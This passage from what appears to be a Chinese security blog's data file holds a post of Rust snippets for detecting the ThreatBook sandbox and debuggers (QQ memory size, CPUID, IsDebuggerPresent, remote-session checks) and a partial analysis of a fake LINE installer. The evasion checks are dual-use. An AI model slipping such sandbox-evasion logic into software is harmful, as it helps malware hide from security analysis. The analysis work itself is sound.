class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;CPU 支持虚拟化&quot;</span>);<br>        &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>            <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;CPU 不支持虚拟化&quot;</span>);<br>        &#125;<br>    &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;无法获取 CPU 特性信息&quot;</span>);<br>    &#125;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">_</span> = Command::<span class=\"hljs-title function_ invoke__\">new</span>(<span class=\"hljs-string\">&quot;cmd.exe&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;/c&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;pause&quot;</span>).<span class=\"hljs-title function_ invoke__\">status</span>();<br>&#125;<br><br></code></pre></td></tr></table></figure>\n\n\n\n<h2 id=\"来看看样本吧-未完待续（-打群星去了\"><a href=\"#来看看样本吧-未完待续（-打群星去了\" class=\"headerlink\" title=\"来看看样本吧  未完待续（ 打群星去了\"></a>来看看样本吧  未完待续（ 打群星去了</h2><p><img src=\"/../img/TBSandbox-Day2-5/image-20240406161627494.png\"></p>\n<p>也不知道是不是上次那哥们传的 就用这个分析以下看看吧</p>\n<h3 id=\"反调试\"><a href=\"#反调试\" class=\"headerlink\" title=\"反调试\"></a>反调试</h3><figure class=\"highlight c\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs c\"><span class=\"hljs-keyword\">if</span> ( IsDebuggerPresent() )   <span class=\"hljs-comment\">//检测当前进程是否正在被调试器调试</span><br>  <span class=\"hljs-keyword\">goto</span> LABEL_2;<br>pbDebuggerPresent = <span class=\"hljs-number\">0</span>;<br>CurrentProcess = GetCurrentProcess();<br><span class=\"hljs-keyword\">if</span> ( CheckRemoteDebuggerPresent(CurrentProcess, &amp;pbDebuggerPresent) )   <span class=\"hljs-comment\">//检测是否正在被远程调试器调试</span><br>&#123;<br>  <span class=\"hljs-keyword\">if</span> ( pbDebuggerPresent )<br>    <span class=\"hljs-keyword\">goto</span> LABEL_2;<br>&#125;<br></code></pre></td></tr></table></figure>\n\n<p>糊一个调试器的测试代码吧 远程调试器就不写了</p>\n<figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">extern</span> <span class=\"hljs-keyword\">crate</span> winapi;<br><br><span class=\"hljs-keyword\">use</span> winapi::um::winuser::IsDebuggerPresent;<br><br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">debugger_present</span> = <span class=\"hljs-keyword\">unsafe</span> &#123; <span class=\"hljs-title function_ invoke__\">IsDebuggerPresent</span>() &#125;;<br>    <span class=\"hljs-keyword\">if</span> debugger_present != <span class=\"hljs-number\">0</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Debugger is present.&quot;</span>);<br>    &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Debugger is not present.&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>\n\n<h3 id=\"判断是否为远程链接\"><a href=\"#判断是否为远程链接\" class=\"headerlink\" title=\"判断是否为远程链接\"></a>判断是否为远程链接</h3><figure class=\"highlight c\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs c\"><span class=\"hljs-keyword\">if</span> ( GetSystemMetrics(<span class=\"hljs-number\">4096</span>) )<br>  <span class=\"hljs-keyword\">goto</span> LABEL_2;<br></code></pre></td></tr></table></figure>\n\n<p>通过**GetSystemMetrics(SM_REMOTESESSION)**来判断是否为远程桌面.</p>\n<figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">extern</span> <span class=\"hljs-keyword\">crate</span> winapi;<br><br><span class=\"hljs-keyword\">use</span> winapi::um::winuser::GetSystemMetrics;<br><br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">remote_session</span> = <span class=\"hljs-keyword\">unsafe</span> &#123; <span class=\"hljs-title function_ invoke__\">GetSystemMetrics</span>(<span class=\"hljs-number\">4096</span>) &#125;;<br>    <span class=\"hljs-keyword\">if</span> remote_session != <span class=\"hljs-number\">0</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Current session is a remote session.&quot;</span>);<br>    &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Current session is not a remote session.&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>\n\n\n\n<p><img src=\"/../img/TBSandbox-Day2-5/image-20240406163153287.png\"></p>\n","site":{"data":{}},"excerpt":"","more":"<h1 id=\"微步沙箱分析-Day2-5\"><a href=\"#微步沙箱分析-Day2-5\" class=\"headerlink\" title=\"微步沙箱分析-Day2.5\"></a>微步沙箱分析-Day2.5</h1><blockquote>\n<p>这是Day2.5 用来总结一些奇淫艺技用的</p>\n</blockquote>\n<h2 id=\"QQ内存大小判断法\"><a href=\"#QQ内存大小判断法\" class=\"headerlink\" title=\"QQ内存大小判断法\"></a>QQ内存大小判断法</h2><p>之前有人说可以使用检查QQ内存大小来判断是否为微步沙箱</p>\n<p>于是我们来测试下看看 糊了一个程序</p>\n<figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">use</span> std::process::Command;<br><span class=\"hljs-keyword\">use</span> sysinfo::&#123;System&#125;;<br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Hello, world!&quot;</span>);<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">s</span> = System::<span class=\"hljs-title function_ invoke__\">new_all</span>();<br>    <span class=\"hljs-title function_ invoke__\">for</span> (_pid,process) <span class=\"hljs-keyword\">in</span> s.<span class=\"hljs-title function_ invoke__\">processes</span>()&#123;<br>        <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">process_name</span> = process.<span class=\"hljs-title function_ invoke__\">name</span>();<br>        <span class=\"hljs-keyword\">if</span> process_name == <span class=\"hljs-string\">&quot;QQ.exe&quot;</span> &#123;<br>            <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Process name is &#123;&#125; Memory is &#123;&#125;&quot;</span>,process_name,process.<span class=\"hljs-title function_ invoke__\">memory</span>())<br>        &#125;<br>    &#125;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">_</span> = Command::<span class=\"hljs-title function_ invoke__\">new</span>(<span class=\"hljs-string\">&quot;cmd.exe&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;/c&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;pause&quot;</span>).<span class=\"hljs-title function_ invoke__\">status</span>();<br>&#125;<br><br></code></pre></td></tr></table></figure>\n\n<p><img src=\"/../img/TBSandbox-Day2-5/image-20240405222531691.png\"></p>\n<p>结果是可行的，QQ只存在单进程且仅有2MB.且通过这个方法似乎可以使微步执行超时？</p>\n<p>喂了避免使用CreateToolhelp32Snapshot造成沙箱生成遍历进程的指标.在这里用到了sysinfo</p>\n<h2 id=\"子进程判断法\"><a href=\"#子进程判断法\" class=\"headerlink\" title=\"子进程判断法\"></a>子进程判断法</h2><p><img src=\"/../img/TBSandbox-Day2-5/image-20240407144934392.png\"></p>\n<p>微步会把奇奇怪怪的进程都塞给Explorer.exe 所以可以通过这个方法简易的判断一下</p>\n<h2 id=\"CPU判断\"><a href=\"#CPU判断\" class=\"headerlink\" title=\"CPU判断\"></a>CPU判断</h2><figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">use</span> std::process::Command;<br><span class=\"hljs-keyword\">use</span> raw_cpuid::CpuId;<br><br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-comment\">// 创建 CPUID 对象</span><br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">cpuid</span> = CpuId::<span class=\"hljs-title function_ invoke__\">new</span>();<br><br>    <span class=\"hljs-comment\">// 查询 CPU 型号和制造商信息</span><br>    <span class=\"hljs-keyword\">if</span> <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">Some</span>(brand_string) = cpuid.<span class=\"hljs-title function_ invoke__\">get_processor_brand_string</span>()<br>    &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;CPU 型号: &#123;&#125;&quot;</span>, brand_string.<span class=\"hljs-title function_ invoke__\">as_str</span>());<br>    &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;无法获取 CPU 型号信息&quot;</span>);<br>    &#125;<br>    <span class=\"hljs-keyword\">if</span> <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">Some</span>(feature_info) = cpuid.<span class=\"hljs-title function_ invoke__\">get_feature_info</span>() &#123;<br>        <span class=\"hljs-keyword\">if</span> feature_info.<span class=\"hljs-title function_ invoke__\">has_vmx</span>() || feature_info.<span class=\"hljs-title function_ invoke__\">has_avx</span>() &#123;<br>            <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;CPU 支持虚拟化&quot;</span>);<br>        &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>            <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;CPU 不支持虚拟化&quot;</span>);<br>        &#125;<br>    &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;无法获取 CPU 特性信息&quot;</span>);<br>    &#125;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">_</span> = Command::<span class=\"hljs-title function_ invoke__\">new</span>(<span class=\"hljs-string\">&quot;cmd.exe&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;/c&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;pause&quot;</span>).<span class=\"hljs-title function_ invoke__\">status</span>();<br>&#125;<br><br></code></pre></td></tr></table></figure>\n\n\n\n<h2 id=\"来看看样本吧-未完待续（-打群星去了\"><a href=\"#来看看样本吧-未完待续（-打群星去了\" class=\"headerlink\" title=\"来看看样本吧  未完待续（ 打群星去了\"></a>来看看样本吧  未完待续（ 打群星去了</h2><p><img src=\"/../img/TBSandbox-Day2-5/image-20240406161627494.png\"></p>\n<p>也不知道是不是上次那哥们传的 就用这个分析以下看看吧</p>\n<h3 id=\"反调试\"><a href=\"#反调试\" class=\"headerlink\" title=\"反调试\"></a>反调试</h3><figure class=\"highlight c\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs c\"><span class=\"hljs-keyword\">if</span> ( IsDebuggerPresent() )   <span class=\"hljs-comment\">//检测当前进程是否正在被调试器调试</span><br>  <span class=\"hljs-keyword\">goto</span> LABEL_2;<br>pbDebuggerPresent = <span class=\"hljs-number\">0</span>;<br>CurrentProcess = GetCurrentProcess();<br><span class=\"hljs-keyword\">if</span> ( CheckRemoteDebuggerPresent(CurrentProcess, &amp;pbDebuggerPresent) )   <span class=\"hljs-comment\">//检测是否正在被远程调试器调试</span><br>&#123;<br>  <span class=\"hljs-keyword\">if</span> ( pbDebuggerPresent )<br>    <span class=\"hljs-keyword\">goto</span> LABEL_2;<br>&#125;<br></code></pre></td></tr></table></figure>\n\n<p>糊一个调试器的测试代码吧 远程调试器就不写了</p>\n<figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">extern</span> <span class=\"hljs-keyword\">crate</span> winapi;<br><br><span class=\"hljs-keyword\">use</span> winapi::um::winuser::IsDebuggerPresent;<br><br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">debugger_present</span> = <span class=\"hljs-keyword\">unsafe</span> &#123; <span class=\"hljs-title function_ invoke__\">IsDebuggerPresent</span>() &#125;;<br>    <span class=\"hljs-keyword\">if</span> debugger_present != <span class=\"hljs-number\">0</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Debugger is present.&quot;</span>);<br>    &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Debugger is not present.&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>\n\n<h3 id=\"判断是否为远程链接\"><a href=\"#判断是否为远程链接\" class=\"headerlink\" title=\"判断是否为远程链接\"></a>判断是否为远程链接</h3><figure class=\"highlight c\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs c\"><span class=\"hljs-keyword\">if</span> ( GetSystemMetrics(<span class=\"hljs-number\">4096</span>) )<br>  <span class=\"hljs-keyword\">goto</span> LABEL_2;<br></code></pre></td></tr></table></figure>\n\n<p>通过**GetSystemMetrics(SM_REMOTESESSION)**来判断是否为远程桌面.</p>\n<figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">extern</span> <span class=\"hljs-keyword\">crate</span> winapi;<br><br><span class=\"hljs-keyword\">use</span> winapi::um::winuser::GetSystemMetrics;<br><br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">remote_session</span> = <span class=\"hljs-keyword\">unsafe</span> &#123; <span class=\"hljs-title function_ invoke__\">GetSystemMetrics</span>(<span class=\"hljs-number\">4096</span>) &#125;;<br>    <span class=\"hljs-keyword\">if</span> remote_session != <span class=\"hljs-number\">0</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Current session is a remote session.&quot;</span>);<br>    &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Current session is not a remote session.&quot;</span>);<br>    &#125;<br>&#125;<br></code></pre></td></tr></table></figure>\n\n\n\n<p><img src=\"/../img/TBSandbox-Day2-5/image-20240406163153287.png\"></p>\n"},{"title":"FakeApp 远控执行分析","date":"2023-10-31T14:48:45.000Z","_content":"\n# FakeApp 远控执行分析\n\n又来啦又来啦，让我们来看看今天的FakeApp能给我带来什么样的惊喜呢！\n\n今日受害者 LINE\n\n![image-20231031225039234](./../img/image-20231031225039234.png)\n\n面对这种程序，我一直没有分析思路。如何去直接提取他的文件（或许可以丢给binwalk看看？（（好像不行\n\n## 样本提取\n\n既然没法通过特殊手段提取这个样本，不如走点正常的流程，直接执行随后用`Process Monitor`对行为进行监控。\n\n由于是之查看文件的行为，所以限定条件变成了进程名和新建文件。从这里就能抓到一个文件LINK.msi\n\n![image-20231031225447565](./../img/image-20231031225447565-1698773944242-1.png)\n\n既然有LINK.MSI，我们就可以看一下她后续的操作了\n\n![image-20231031230617669](./../img/image-20231031230617669.png)\n\nCab也找到了，剩下的可以直接解压Link1.cab查看文件了。\n\n![image-20231031230741416](./../img/image-20231031230741416.png)\n\n第一眼看到exe和俩dll时，我还开心的以为是白加黑，可惜情况并不如我所愿 `b1b86e6fd9.OIL`/`d0437f784fad.LLL`/`dd5c0d72bf.SIJ`为三个压缩包（有密码\n\nexe和z.dll是7zip。所以似乎可以把目光转向WEB.dll这个倒霉蛋了\n\n![image-20231031231145649](./../img/image-20231031231145649.png)\n\n## 半成品分析的WEB.dll\n\n这里还得感谢DI，WEB.dll刚落地就给扬了\n\n![](./../img/image-20231031231341053.png)\n\n大致思路也清晰了，开始转向WEB.dll。由于我逆向一直是半斤八两，索性直接看String里有什么了\n\n![](./../img/image-20231031231449318.png)\n\n很好，很有精神。找到了个路径，看起来像是拼接行为。随后接着研究吧\n\n![](./../img/image-20231031232729711.png)\n\n通过内容来看是从GKAMSMDV中读取XYL项，打开发现是个Vmware桥接的配置信息，但是里面多了自定义项XLY\n\n![](./../img/image-20231031231929836.png)\n\n随后往下翻阅，可以看到又是在构造语句\n\n![](./../img/image-20231031232846022.png)\n\n好了，可以确定构造内容了\n\n有部分路径没找到，所以又用到了。。。Process monitor查看\n\n```\n例\nC:\\Users\\Default\\Desktop\\(P0)LNKNEW\\(P1)588388456db280daIJE.exe x C:\\Users\\Default\\Desktop\\(P0)LNKNEW\\(P2)d0437f784fad.LLL -o(干，这个路径没找到哪来的 烦)C:\\Users\\RhineLab\\AppData\\ -p(P3)0795ea6f59475671GHB -aos\n```\n\n![](./../img/image-20231031234351542.png)\n\n文件提取完成\n\n![image-20231031235325776](./../img/image-20231031235325776.png)\n\n## 流程图\n\n好好好！分析到这里就差不多了，写个流程图吧。是在肝不动了。挖坑下次继续 \n\n> 样本留存 #7004665f20293bc4d74b39ddc922c6668d9df803.zip\n\n![image-20231101030216781](./../img/image-20231101030216781.png)\n\n\n\n![image-20231101030517618](./../img/image-20231101030517618.png)\n\n![image-20231101013457720](./../img/image-20231101013457720.png)\n","source":"_posts/Virus-Analysis-0001.md","raw":"---\ntitle: FakeApp 远控执行分析\ndate: 2023-10-31 22:48:45\ntags: 病毒分析\n---\n\n# FakeApp 远控执行分析\n\n又来啦又来啦，让我们来看看今天的FakeApp能给我带来什么样的惊喜呢！\n\n今日受害者 LINE\n\n![image-20231031225039234](./../img/image-20231031225039234.png)\n\n面对这种程序，我一直没有分析思路。如何去直接提取他的文件（或许可以丢给binwalk看看？（（好像不行\n\n## 样本提取\n\n既然没法通过特殊手段提取这个样本，不如走点正常的流程，直接执行随后用`Process Monitor`对行为进行监控。\n\n由于是之查看文件的行为，所以限定条件变成了进程名和新建文件。从这里就能抓到一个文件LINK.msi\n\n![image-20231031225447565](./../img/image-20231031225447565-1698773944242-1.png)\n\n既然有LINK.MSI，我们就可以看一下她后续的操作了\n\n![image-20231031230617669](./../img/image-20231031230617669.png)\n\nCab也找到了，剩下的可以直接解压Link1.cab查看文件了。\n\n![image-20231031230741416](./../img/image-20231031230741416.png)\n\n第一眼看到exe和俩dll时，我还开心的以为是白加黑，可惜情况并不如我所愿 `b1b86e6fd9.OIL`/`d0437f784fad.LLL`/`dd5c0d72bf.SIJ`为三个压缩包（有密码\n\nexe和z.dll是7zip。所以似乎可以把目光转向WEB.dll这个倒霉蛋了\n\n![image-20231031231145649](./../img/image-20231031231145649.png)\n\n## 半成品分析的WEB.dll\n\n这里还得感谢DI，WEB.dll刚落地就给扬了\n\n![](./../img/image-20231031231341053.png)\n\n大致思路也清晰了，开始转向WEB.dll。由于我逆向一直是半斤八两，索性直接看String里有什么了\n\n![](./../img/image-20231031231449318.png)\n\n很好，很有精神。找到了个路径，看起来像是拼接行为。随后接着研究吧\n\n![](./../img/image-20231031232729711.png)\n\n通过内容来看是从GKAMSMDV中读取XYL项，打开发现是个Vmware桥接的配置信息，但是里面多了自定义项XLY\n\n![](./../img/image-20231031231929836.png)\n\n随后往下翻阅，可以看到又是在构造语句\n\n![](./../img/image-20231031232846022.png)\n\n好了，可以确定构造内容了\n\n有部分路径没找到，所以又用到了。。。Process monitor查看\n\n```\n例\nC:\\Users\\Default\\Desktop\\(P0)LNKNEW\\(P1)588388456db280daIJE.exe x C:\\Users\\Default\\Desktop\\(P0)LNKNEW\\(P2)d0437f784fad.LLL -o(干，这个路径没找到哪来的 烦)C:\\Users\\RhineLab\\AppData\\ -p(P3)0795ea6f59475671GHB -aos\n```\n\n![](./../img/image-20231031234351542.png)\n\n文件提取完成\n\n![image-20231031235325776](./../img/image-20231031235325776.png)\n\n## 流程图\n\n好好好！分析到这里就差不多了，写个流程图吧。是在肝不动了。挖坑下次继续 \n\n> 样本留存 #7004665f20293bc4d74b39ddc922c6668d9df803.zip\n\n![image-20231101030216781](./../img/image-20231101030216781.png)\n\n\n\n![image-20231101030517618](./../img/image-20231101030517618.png)\n\n![image-20231101013457720](./../img/image-20231101013457720.png)\n","slug":"Virus-Analysis-0001","published":1,"updated":"2025-02-12T15:31:51.312Z","comments":1,"layout":"post","photos":[],"link":"","_id":"cm722r5bn00067dp82d3v5e9f","content":"<h1 id=\"FakeApp-远控执行分析\"><a href=\"#FakeApp-远控执行分析\" class=\"headerlink\" title=\"FakeApp 远控执行分析\"></a>FakeApp 远控执行分析</h1><p>又来啦又来啦，让我们来看看今天的FakeApp能给我带来什么样的惊喜呢！</p>\n<p>今日受害者 LINE</p>\n<p><img src=\"/./../img/image-20231031225039234.png\" alt=\"image-20231031225039234\"></p>\n<p>面对这种程序，我一直没有分析思路。如何去直接提取他的文件（或许可以丢给binwalk看看？（（好像不行</p>\n<h2 id=\"样本提取\"><a href=\"#样本提取\" class=\"headerlink\" title=\"样本提取\"></a>样本提取</h2><p>既然没法通过特殊手段提取这个样本，不如走点正常的流程，直接执行随后用<code>Process Monitor</code>对行为进行监控。</p>\n<p>由于是之查看文件的行为，所以限定条件变成了进程名和新建文件。从这里就能抓到一个文件LINK.msi</p>\n<p><img src=\"/./../img/image-20231031225447565-1698773944242-1.png\" alt=\"image-20231031225447565\"></p>\n<p>既然有LINK.MSI，我们就可以看一下她后续的操作了</p>\n<p><img src=\"/./../img/image-20231031230617669.png\" alt=\"image-20231031230617669\"></p>\n<p>Cab也找到了，剩下的可以直接解压Link1.cab查看文件了。</p>\n<p><img src=\"/./../img/image-20231031230741416.png\" alt=\"image-20231031230741416\"></p>\n<p>第一眼看到exe和俩dll时，我还开心的以为是白加黑，可惜情况并不如我所愿 <code>b1b86e6fd9.OIL</code>&#x2F;<code>d0437f784fad.LLL</code>&#x2F;<code>dd5c0d72bf.SIJ</code>为三个压缩包（有密码</p>\n<p>exe和z.dll是7zip。所以似乎可以把目光转向WEB.dll这个倒霉蛋了</p>\n<p><img src=\"/./../img/image-20231031231145649.png\" alt=\"image-20231031231145649\"></p>\n<h2 id=\"半成品分析的WEB-dll\"><a href=\"#半成品分析的WEB-dll\" class=\"headerlink\" title=\"半成品分析的WEB.dll\"></a>半成品分析的WEB.dll</h2><p>这里还得感谢DI，WEB.dll刚落地就给扬了</p>\n<p><img src=\"/./../img/image-20231031231341053.png\"></p>\n<p>大致思路也清晰了，开始转向WEB.dll。由于我逆向一直是半斤八两，索性直接看String里有什么了</p>\n<p><img src=\"/./../img/image-20231031231449318.png\"></p>\n<p>很好，很有精神。找到了个路径，看起来像是拼接行为。随后接着研究吧</p>\n<p><img src=\"/./../img/image-20231031232729711.png\"></p>\n<p>通过内容来看是从GKAMSMDV中读取XYL项，打开发现是个Vmware桥接的配置信息，但是里面多了自定义项XLY</p>\n<p><img src=\"/./../img/image-20231031231929836.png\"></p>\n<p>随后往下翻阅，可以看到又是在构造语句</p>\n<p><img src=\"/./../img/image-20231031232846022.png\"></p>\n<p>好了，可以确定构造内容了</p>\n<p>有部分路径没找到，所以又用到了。。。Process monitor查看</p>\n<figure class=\"highlight armasm\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs armasm\">例<br>C:\\Users\\Default\\Desktop\\(<span class=\"hljs-built_in\">P0</span>)LNKNEW\\(<span class=\"hljs-built_in\">P1</span>)<span class=\"hljs-number\">588388456</span>db280daIJE.exe x C:\\Users\\Default\\Desktop\\(<span class=\"hljs-built_in\">P0</span>)LNKNEW\\(<span class=\"hljs-built_in\">P2</span>)d0437f784fad.LLL -o(干，这个路径没找到哪来的 烦)C:\\Users\\RhineLab\\AppData\\ -p(<span class=\"hljs-built_in\">P3</span>)<span class=\"hljs-number\">0795</span>ea6f59475671GHB -aos<br></code></pre></td></tr></table></figure>\n\n<p><img src=\"/./../img/image-20231031234351542.png\"></p>\n<p>文件提取完成</p>\n<p><img src=\"/./../img/image-20231031235325776.png\" alt=\"image-20231031235325776\"></p>\n<h2 id=\"流程图\"><a href=\"#流程图\" class=\"headerlink\" title=\"流程图\"></a>流程图</h2><p>好好好！分析到这里就差不多了，写个流程图吧。是在肝不动了。挖坑下次继续 </p>\n<blockquote>\n<p>样本留存 #7004665f20293bc4d74b39ddc922c6668d9df803.zip</p>\n</blockquote>\n<p><img src=\"/./../img/image-20231101030216781.png\" alt=\"image-20231101030216781\"></p>\n<p><img src=\"/./../img/image-20231101030517618.png\" alt=\"image-20231101030517618\"></p>\n<p><img src=\"/./../img/image-20231101013457720.png\" alt=\"image-20231101013457720\"></p>\n","site":{"data":{}},"excerpt":"","more":"<h1 id=\"FakeApp-远控执行分析\"><a href=\"#FakeApp-远控执行分析\" class=\"headerlink\" title=\"FakeApp 远控执行分析\"></a>FakeApp 远控执行分析</h1><p>又来啦又来啦，让我们来看看今天的FakeApp能给我带来什么样的惊喜呢！</p>\n<p>今日受害者 LINE</p>\n<p><img src=\"/./../img/image-20231031225039234.png\" alt=\"image-20231031225039234\"></p>\n<p>面对这种程序，我一直没有分析思路。如何去直接提取他的文件（或许可以丢给binwalk看看？（（好像不行</p>\n<h2 id=\"样本提取\"><a href=\"#样本提取\" class=\"headerlink\" title=\"样本提取\"></a>样本提取</h2><p>既然没法通过特殊手段提取这个样本，不如走点正常的流程，直接执行随后用<code>Process Monitor</code>对行为进行监控。</p>\n<p>由于是之查看文件的行为，所以限定条件变成了进程名和新建文件。从这里就能抓到一个文件LINK.msi</p>\n<p><img src=\"/./../img/image-20231031225447565-1698773944242-1.png\" alt=\"image-20231031225447565\"></p>\n<p>既然有LINK.MSI，我们就可以看一下她后续的操作了</p>\n<p><img src=\"/./../img/image-20231031230617669.png\" 